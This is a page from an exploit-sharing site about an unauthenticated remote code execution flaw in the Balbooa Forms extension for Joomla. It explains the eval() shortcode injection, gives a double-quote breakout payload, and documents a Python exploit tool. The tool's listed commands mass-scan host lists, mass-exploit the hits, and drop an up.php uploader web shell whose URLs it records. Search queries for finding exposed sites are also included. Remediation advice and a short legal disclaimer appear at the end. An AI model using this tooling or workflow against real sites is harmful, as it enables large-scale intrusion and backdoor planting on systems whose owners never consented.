POCBIT

Telegram — New PoC releases & critical CVE alerts

You can join our Telegram channel to get instant updates on new PoC releases and critical CVE alerts.

Join @pocbit
Joomlacritical

CVE-2026-102425 — Joomla Balbooa Forms (com_baforms) Field Shortcode → Unauthenticated RCE

September 30, 2026 · 380 views

Balbooa Forms for Joomla 1.0.0–2.4.3.3: when a public form runs PHP-after-submission via eval(), field shortcodes are replaced with raw visitor input inside double-quoted PHP — classic ";breakout;// → RCE. CVSS 4.0 9.5 Critical (AT:P). Fixed in 2.4.3.4. Not CVE-2026-67364. Python PoC: version + public form detect, check/exploit, up.php drop, interactive + mass -j.

#joomla#balbooa#com_baforms#rce#code-injection#cms#unauthenticated#cwe-94#critical

CVE:

CVE-2026-102425

Date:

2026-09-30

Severity:

CRITICAL

Exploit source

Full PoC repository on GitHub (public).

Description

Overview

CVE-2026-102425 — Balbooa Forms (com_baforms) for Joomla — unauthenticated remote code execution via field shortcode injection in optional PHP-after-submission actions (eval()).

| | | |---|---| | CNA | Joomla! Project (PUBLISHED 2026-09-29) | | Affected | 1.0.0 – 2.4.3.3 | | Fix | ≥ 2.4.3.4 | | CWE | CWE-94 (Code Injection) | | CVSS 4.0 | 9.5 Critical — CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H | | Finders | Łukasz Rybak, Sergiy Tryzhychynskyi |

PoC page: https://pocbit.org/pocs/cve-2026-102425

GitHub: murrez/CVE-2026-102425

CVE.org: CVE-2026-102425

NVD: CVE-2026-102425

Mechanism (Joomla CNA)

Administrators can attach PHP that runs after a public form submit. That PHP may contain form-field shortcodes. Before eval(), Balbooa replaces each shortcode with the raw submitted value (no escaping).

Exploitation requires all of:

  1. Extension < 2.4.3.4
  2. A public form with PHP-after-submission enabled
  3. PHP that embeds a field shortcode inside a double-quoted PHP string (e.g. ";echo POC;//)

AT:P (Attack Requirements: Present) — vulnerable configuration must exist; installing the component alone is insufficient.

This is not CVE-2026-67364 (URL [parameter=X] shortcode, fixed 2.4.3.2). Use --include-67364 only to test that separate issue.

Same release train: also patch CVE-2026-102424, CVE-2026-101127, CVE-2026-101112, CVE-2026-101126.

Bundled tool (Python 3)

Download cve-2026-102425.py from this page — it is a PoCbit bundle extractor. Run once to write poc.py, _engine.py, and up.php into the same folder.

pip install requests urllib3 colorama

python cve-2026-102425.py          # writes poc.py, _engine.py, up.php
python poc.py --help
python poc.py --lab

python poc.py -u https://site.tld --check
python poc.py -u https://site.tld

python poc.py --check fofa_hosts.txt -t 20    # mass scan → hits.txt
python poc.py hits.txt -t 12                  # mass exploit → exploited.txt

python _engine.py --help                      # full CLI / JSONL

| Mode | Behavior | |------|----------| | check | com_baforms, manifest version, affected_version, public_form_detected | | check (default hits) | hits.txt only if affected and public form HTML loads | | check --all-affected | All hosts on vulnerable version (noisy FOFA triage) | | check --aggressive | More paths, loadAjaxForm ID scan | | exploit | form.message submit + legacy tasks; double-quote breakout payloads | | exploit --include-67364 | Adds URL-parameter shortcode attempts (67364 class) | | exploit --aggressive | Full scrape + loadAjaxForm discovery | | --lab | Local mock: double-quoted eval + field injection | | mass | --list + -j → JSONL, hits.txt, exploited.txt |

On exploit, the PoC tries file_put_contents via field shortcode RCE to drop up.php (multipart uploader) under common Joomla paths, verifies POCBIT-102425-OK, and records shell_url in exploited.txt when web-visible.

HTTP surface (Balbooa 2.x / Joomla 4+)

| Step | Request | |------|---------| | Load form | GET index.php?option=com_baforms&task=form.loadAjaxForm&id=N | | Submit | POST form action with task=form.message, form-id, fields | | Note | Avoid format=json on front tasks on many J4 sites |

Legacy: view=form&form_id=N, form.submitForm.

Hunting (examples)

body="com_baforms" || body="/components/com_baforms/"
body="balbooa" && body="com_baforms"
index.php?option=com_baforms

Remediation

  1. Upgrade Balbooa Forms to 2.4.3.4+
  2. Remove PHP-after-submission actions that embed field or URL shortcodes until patched
  3. Enable reCAPTCHA on public submits
  4. Audit forms, admin users, and images/baforms/uploads/

Legal and ethical use

Authorized security testing and patch validation only.

References

Related PoCs

Same platform, vendor, or tags — explore more write-ups on Pocbit.

Browse full PoC archive →